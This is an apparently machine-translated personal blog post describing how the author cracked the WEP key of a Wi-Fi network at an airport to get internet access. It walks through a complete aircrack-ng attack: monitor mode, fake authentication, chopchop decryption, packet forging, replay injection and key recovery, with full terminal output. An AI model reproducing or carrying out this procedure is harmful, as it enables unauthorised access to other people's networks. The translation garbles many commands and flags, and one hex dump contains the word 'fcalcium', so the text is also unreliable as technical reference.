Wireless cracking using Ubuntu

I picked up my girlfriend a few days ago and met my girlfriend at the airport. Because I had been sitting at the airport for two hours and wanted to access the Internet through a computer, I found that it was basically encrypted, no usable. so there's no way. It's just hard to force it. the whole process took 20 minutes.
My environment is ubuntu9.04. the laptop is an IBM x200 wireless network card and an Intel (r) WiFi Link.
5100 AGN. It is too convenient to do this in Linux. The following describes the entire wireless cracking process.
Enable WLAN for listening mode
Fukai @ Fukai-LAPTOP :~ $ Sudo airmon-ng start wlan0
Found 4 processes that cocould cause trouble.
If airodump-ng, aireplay-NG or airtun-ng stops working after
A short period of time, you may want to kill (some of) them!
PID name
3316 NetworkManager
3335 wpa_supplicant
3340 avahi-daemon
3341 avahi-daemon
Interface chipset driver
Mon0 unknown iwlagn-[phy0]
(Monitor mode enabled on mon0
Start packet capture (do not turn off this terminal)
Fukai @ Fukai-LAPTOP :~ $ Sudo airodump-ng-W chop. Cap-IVS-Channel 11 mon0
Ch 11] [BAT: 1 hour 13 mins] [elapsed: 19 mins] [
Bssid PWR rxq beacons # data, #/s ch mb enc Cipher
Auth E
00: 02: 2D: B4: 31: 01-55 0 10 0 0 1 11
OPN C
00: 02: 2D: B4: 5D: 8d-51 100 10723 199 0 11 11
OPN C
00: 02: 2D: B4: 30: F6-72 96 10393 206 0 11 11
OPN C
00: 0f: B5: 79: DD: dd-76 93 8306 24444 0 11 54. WEP
OPN u
00: 02: 2D: B4: 30: F2-82 2 1463 46 0 6 11
OPN C
00: 02: 2D: B4: 5D: 78-74 0 5 0 0 1 11
OPN C
00: 02: 2D: B4: 31: 5a-76 0 6 0 0 1 11
OPN C
00: 0d: 97: 04: 90: 49-76 0 0 1 0 1 54. wpa2 CCMP
PSK s
00: 02: 2D: B4: 5D: 64-80 0 8 0 0 1 11
OPN C
Bssid station PWR rate lost packets probes
00: 0f: B5: 79: DD: dd 00: 21: 5D: 90: E9: 0a 0 1-0 0 129203
00: 02: 2D: B4: 30: F2 00: 16: Ea: E1: 57: 44-87 2-1 0 22
(Not associated) 00: 1c: B3: 1c: BA: D0-72 0-1 0 17
^ C
Perform the fakeauth attack (I crashed from X60 to this step)
Fukai @ Fukai-LAPTOP :~ $ Sudo aireplay-ng-1 0-a 00: 0f: B5: 79: DD: dd-H
00: 21: 5D: 90: E9: 0a mon0
Note:-h indicates the host MAC address.-A indicates the address of the Wireless AP to be cracked.
21:59:31 waiting for beacon frame (bssid: 00: 0f: B5: 79: DD: dd) on Channel 11
21:59:31 sending authentication request (Open System) [ack]
21:59:31 authentication successful
21:59:31 sending association request [ack]
21:59:31 Association successful (Aid: 1)
Chopchop attacks
Fukai @ Fukai-LAPTOP :~ $ Sudo aireplay-ng-4-B 00: 0f: B5: 79: DD: dd-H
00: 21: 5D: 90: E9: 0a mon0
22:00:05 waiting for beacon frame (bssid: 00: 0f: B5: 79: DD: dd) on Channel 11
Read 2507 packets...
Size: 86, fromds: 1, Tods: 0 (WEP)
Bssid = 00: 0f: B5: 79: DD: dd
DeST. Mac = FF: FF
Source MAC = 00: 0f: B5: 79: DD: dd
0 × 0000: 0842 0000 FFFF 000f b579 0498. B ........... Y ..
0x0010: 000f b579 0498 005a 6772 0400 6e0c 067f... Y... Zgr... n ..
0 × 0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab | ..... 1 .&... ^ P ..
0x0030: 3a1f 1b56 fcalcium 14f0 6f62 7d0b c94e 9d83:... V .... Ob}... n ..
0 × 0040: fca4 5e17 703f f414 828d bd8c 8d21 a2bc... ^. P ?.......!..
0 × 0050: 8767 f385 61cc. g...
Use this packet? Y
Saving chosen packet in replay_src-0413-220115.cap
Offset 85 (0% done) | XOR = F9 | Pt = 35 | 92 frames written in
1569 Ms
Offset 84 (1% done) | XOR = 82 | Pt = E3 | 33 frames written in
561 Ms
Offset 83 (3% done) | XOR = 63 | Pt = E6 | 141 frames written in
2404 Ms
Offset 82 (5% done) | XOR = 77 | Pt = 84 | 198 frames written in
3373 Ms
Offset 81 (7% done) | XOR = 67 | Pt = 00 | 69 frames written in
1166 Ms
Offset 80 (9% done) | XOR = 87 | Pt = 00 | 3 frames written in
50 ms
Offset 79 (11% done) | XOR = BC | Pt = 00 | 461 frames written in
7840 Ms
Offset 78 (13% done) | XOR = a2 | Pt = 00 | 452 frames written in
7665 Ms
Offset 77 (15% done) | XOR = 21 | Pt = 00 | 156 frames written in
2660 Ms
Offset 76 (17% done) | XOR = 8d | Pt = 00 | 256 frames written in
4360 Ms
Offset 75 (19% done) | XOR = 8C | Pt = 00 | 31 frames written in
519 Ms
Offset 74 (21% done) | XOR = BD | Pt = 00 | 12 frames written in
211 Ms
Offset 73 (23% done) | XOR = 8d | Pt = 00 | 681 frames written in
11572 Ms
Offset 72 (25% done) | XOR = 82 | Pt = 00 | 231 frames written in
3936 Ms
Offset 71 (26% done) | XOR = 14 | Pt = 00 | 126 frames written in
2148 Ms
Offset 70 (28% done) | XOR = F4 | Pt = 00 | 359 frames written in
6085 Ms
Offset 69 (30% done) | XOR = 3f | Pt = 00 | 143 frames written in
2443 Ms
Offset 68 (32% done) | XOR = 70 | Pt = 00 | 253 frames written in
4307 Ms
Offset 67 (34% done) | XOR = 17 | Pt = 00 | 70 frames written in
1182 Ms
Offset 66 (36% done) | XOR = 5E | Pt = 00 | 100 frames written in
1691 Ms
Offset 65 (38% done) | XOR = A4 | Pt = 00 | 164 frames written in
2779 Ms
Offset 64 (40% done) | XOR = FC | Pt = 00 | 1101 frames written in
18689 Ms
Offset 63 (42% done) | XOR = E6 | Pt = 65 | 1054 frames written in
17906 Ms
Offset 62 (44% done) | XOR = 9d | Pt = 00 | 226 frames written in
3819 Ms
Offset 61 (46% done) | XOR = E6 | Pt = A8 | 181 frames written in
3076 Ms
Offset 60 (48% done) | XOR = 09 | Pt = C0 | 16 frames written in
271 Ms
Offset 59 (50% done) | XOR = 0b | Pt = 00 | 55 frames written in
939 Ms
Offset 58 (51% done) | XOR = 7d | Pt = 00 | 71 frames written in
1197 Ms
Offset 57 (53% done) | XOR = 62 | Pt = 00 | 228 frames written in
3860 Ms
Offset 56 (55% done) | XOR = 6f | Pt = 00 | 331 frames written in
5626 Ms
Offset 55 (57% done) | XOR = f0 | Pt = 00 | 198 frames written in
3354 Ms
Offset 54 (59% done) | XOR = 14 | Pt = 00 | 64 frames written in
1089 Ms
Offset 53 (61% done) | XOR = A3 | Pt = 01 | 246 frames written in
4174 Ms
Offset 52 (63% done) | XOR = FC | Pt = 00 | 754 frames written in
12819 Ms
Offset 51 (65% done) | XOR = Fe | Pt = A8 | 102 frames written in
1721 Ms
Offset 50 (67% done) | XOR = dB | Pt = C0 | 42 frames written in
721 Ms
Offset 49 (69% done) | XOR = 87 | Pt = 98 | 97 frames written in
1645 Ms
Offset 48 (71% done) | XOR = 3E | Pt = 04 | 47 frames written in
797 Ms
Offset 47 (73% done) | XOR = d2 | Pt = 79 | 63 frames written in
1064 Ms
Offset 46 (75% done) | XOR = 51 | Pt = B5 | 252 frames written in
4252 Ms
Offset 45 (76% done) | XOR = 5f | Pt = 0f | 108 frames written in
1828 Ms
Offset 44 (78% done) | XOR = 5E | Pt = 00 | 241 frames written in
4074 Ms
Offset 43 (80% done) | XOR = F2 | Pt = 01 | 193 frames written in
3257 Ms
Offset 42 (82% done) | XOR = 03 | Pt = 00 | 1126 frames written in
19048 Ms
Offset 41 (84% done) | XOR = 18 | Pt = 04 | 420 frames written in
7191 Ms
Offset 40 (86% done) | XOR = 20 | Pt = 06 | 586 frames written in
9941 Ms
Offset 39 (88% done) | XOR = F1 | Pt = 00 | 394 frames written in
6683 Ms
Offset 38 (90% done) | XOR = 39 | Pt = 08 | 228 frames written in
3868 Ms
Offset 37 (92% done) | XOR = 13 | Pt = 01 | 1015 frames written in
17194 Ms
Offset 36 (94% done) | XOR = FF | Pt = 00 | 282 frames written in
4801 Ms
Offset 35 (96% done) | XOR = F8 | Pt = 06 | 1830 frames written in
31105 Ms
Sent 2386 packets, current guess: 48...
The AP appears to Drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.
Saving plaintext in replay_dec-0413-220624.cap
Saving keystream in replay_dec-0413-220624.xor
Completed in 303 s (0.16 Bytes/s)
Use tcpdump to view the generated cap File Content
Fukai @ Fukai-LAPTOP :~ $ Tcpdump-S 0-n-e-r replay_dec-0413-220624.cap
Reading from file replay_dec-0413-220624.cap, link-type ieee802_11 (802.11)
22:06:24. 530668 da: FF bssid: 00: 0f: B5: 79: DD: dd
Sa: 00: 0f: B5: 79: DD: dd LLC, dsap snap (0xaa) Individual, ssap snap (0xaa)
Command, CTRL 0 × 03: Oui Ethernet (0 × 000000), ethertype ARP (0 × 0806): ARP
Who-has 192.168.0.101 tell 192.168.0.1
Construct the injection package
Root @ MICKEY:/home/Mickey # packetforge-ng-0-a 00: 1D: 0f: 72: A0: 3C-H
00: 1c: BF: 6a: E1: E9-k running 255.255.255-l 255.255.255.255-y
Replay_dec-0204-000647.xor-W fvck. Cap
Wrote packet to: fvck. Cap
Interactive Attack
Fukai @ Fukai-LAPTOP :~ $ Sudo packetforge-ng-0-a 00: 0f: B5: 79: DD: dd-H
00: 21: 5D: 90: E9: 0a-k running 255.255.255-l 255.255.255-y
Replay_dec-0413-220624.xor-W fvck. Cap
Wrote packet to: fvck. Cap
Fukai @ Fukai-LAPTOP :~ $ Sudo aireplay-ng-2-r fvck. Cap mon0
No source MAC (-h) specified. Using the device MAC (00: 21: 5D: 90: E9: 0a)
Size: 68, fromds: 0, Tods: 1 (WEP)
Bssid = 00: 0f: B5: 79: DD: dd
DeST. Mac = FF: FF
Source MAC = 00: 21: 5D: 90: E9: 0a
0 × 0000: 0841 0201 000f b579 0498 0021 5d90 e90a. ..... Y...]...
0 × 0010: FFFF 8001 6772 0400 6e0c 067f ........ Gr... n ..
0 × 0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e7e 0c42 | ..... 1 .&... ^ ~. B
0 × 0030: d78d 2401 035c 14f0 6f62 7d0b f619 6219 }... B.
0 × 0040: e060 df45. '. e
Use this packet? Y
Saving chosen packet in replay_src-0413-220845.cap
You shoshould also start airodump-ng to capture replies.
End of file.
Cracking
Fukai @ Fukai-LAPTOP :~ $ Sudo aircrack-NG *. IVS
Aircrack-ng 1.0 RC3
[00:00:02] tested 296 keys (got 15985 IVS)
KB depth byte (vote)
0 5/6 01 (20224) 00 (19968) 61 (19968) 06 (19712) 7B (19712)
1 3/5 0f (20736) 24 (20480) 99 (20480) Cd (20480) 0d (20224)
2 0/2 45 (23040) 17 (22272) 41 (20992) B2 (20992) 52 (20736)
3 0/1 67 (25600) 3E (20992) B3 (20992) 57 (20224) 76 (20224)
4 4/5 89 (20480) 82 (20224) 4B (19968) 81 (19968) E6 (19712)
Key found! [01: 23: 45: 67: 89]
Decrypted correctly: 100%